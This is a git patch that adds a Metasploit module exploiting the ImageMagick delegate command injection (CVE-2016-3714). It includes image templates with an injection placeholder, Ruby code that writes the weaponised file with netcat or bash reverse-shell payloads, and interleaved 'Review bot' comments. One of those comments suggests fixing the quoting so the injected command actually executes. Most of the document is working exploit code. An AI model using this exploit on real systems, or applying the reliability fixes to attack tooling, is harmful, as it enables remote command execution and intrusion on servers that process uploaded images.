From 5c04db7a09f0c339c143fd2be98a28447f06d4f5 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 3 May 2016 16:43:16 -0500
Subject: [PATCH] Add ImageMagick exploit
---
data/exploits/CVE-2016-3714/msf.miff | 14 ++++
data/exploits/CVE-2016-3714/msf.mvg | 8 ++
data/exploits/CVE-2016-3714/msf.svg | 5 ++
.../unix/fileformat/imagemagick_delegate.rb | 73 +++++++++++++++++++
4 files changed, 100 insertions(+)
create mode 100644 data/exploits/CVE-2016-3714/msf.miff
create mode 100644 data/exploits/CVE-2016-3714/msf.mvg
create mode 100644 data/exploits/CVE-2016-3714/msf.svg
create mode 100644 modules/exploits/unix/fileformat/imagemagick_delegate.rb
diff --git a/data/exploits/CVE-2016-3714/msf.miff b/data/exploits/CVE-2016-3714/msf.miff
new file mode 100644
index 0000000000..619ebe0e9a
--- /dev/null
+++ b/data/exploits/CVE-2016-3714/msf.miff
@@ -0,0 +1,14 @@
+id=ImageMagick version=1.0
+class=DirectClass colors=0 matte=False
+columns=1 rows=1 depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";Lorem ipsum"}
+
+:ÿÿÿÿÿÿ
diff --git a/data/exploits/CVE-2016-3714/msf.mvg b/data/exploits/CVE-2016-3714/msf.mvg
new file mode 100644
index 0000000000..db2ceeb666
--- /dev/null
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@@ -0,0 +1,8 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 'url(https:";Lorem ipsum")'
+pop graphic-context
+pop graphic-context
diff --git a/data/exploits/CVE-2016-3714/msf.svg b/data/exploits/CVE-2016-3714/msf.svg
new file mode 100644
index 0000000000..effe2211b4
--- /dev/null
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -0,0 +1,5 @@
+ + + + 
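Review bot: In msf.mvg the substituted payload is followed by a bare `"` (`'url(https:";Lorem ipsum")'`), and msf.miff's `label={";Lorem ipsum"}` has the same shape. If the `https` delegate wraps `%M` in double quotes, as in `"https:%M"`, the resulting command line ends in an unterminated quoted string and `sh -c` rejects the whole line before running anything, so the injection would never execute; this is inferred from the template alone, since no delegate definition is part of the patch. Balancing the quote in the template, e.g. `'url(https:";Lorem ipsum";")'`, and likewise in the MIFF label, removes the dependence on whatever follows `%M` in the delegate command. The msf.svg hunk's content is not visible here, so it is not reviewed.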
diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
new file mode 100644
index 0000000000..7d8c336f96
--- /dev/null
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
+ 'Description' => %q{
+ This module exploits a command injection in ImageMagick <= 7.0.1-0.
+ },
+ 'Author' => [
+ 'stewie', # Vulnerability discovery
+ 'Nikolay Ermishkin', # Vulnerability discovery
+ 'wvu', # Metasploit module
+ 'hdm' # Metasploit module
+ ],
+ 'References' => [
+ %w{CVE 2016-3714},
+ %w{URL https://imagetragick.com/}
+ ],
+ 'DisclosureDate' => 'May 3 2016',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => false,
+ 'Payload' => {
+ 'BadChars' => "\x22\x27\x5c", # ", ', and \
+ 'Compat' => {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic netcat bash-tcp'
+ }
+ },
+ 'Targets' => [
+ ['SVG file', template: 'msf.svg'],
+ ['MVG file', template: 'msf.mvg'],
+ ['MIFF file', template: 'msf.miff']
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'DisablePayloadHandler' => false,
+ 'WfsDelay' => 9001
+ }
+ ))
+
+ register_options([
+ OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
+ ])
+ end
+
+ def exploit
+ if target.name == 'SVG file'
+ p = Rex::Text.html_encode(payload.encoded)
+ else
+ p = payload.encoded
+ end
+
+ file_create(template.sub('Lorem ipsum', p))
+ end
+
+ def template
+ File.read(File.join(
+ Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
+ ))
+ end
+
+end
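Review bot: In `exploit`, the payload is handed to `String#sub` as a plain replacement string, where Ruby interprets `\0`, `\&`, `\1` and `\\` as back-references; that is only safe because `\x5c` appears in `BadChars` further up, and any later edit to that list would silently corrupt the written payload. The block form removes the coupling: `encoded_payload = target.name == 'SVG file' ? Rex::Text.html_encode(payload.encoded) : payload.encoded` followed by `file_create(template.sub('Lorem ipsum') { encoded_payload })` (the local `p` also shadows `Kernel#p`). Selecting the encoder by the human-readable target name is brittle; a per-target flag such as `['SVG file', template: 'msf.svg', html_encode: true]` read via `target[:html_encode]` keeps the choice next to the template it applies to. The Description could also explain why `FILENAME` defaults to `msf.png` while every template is SVG, MVG or MIFF text — presumably because the vulnerable ImageMagick identifies the format from content rather than extension — confirm and document that in the module.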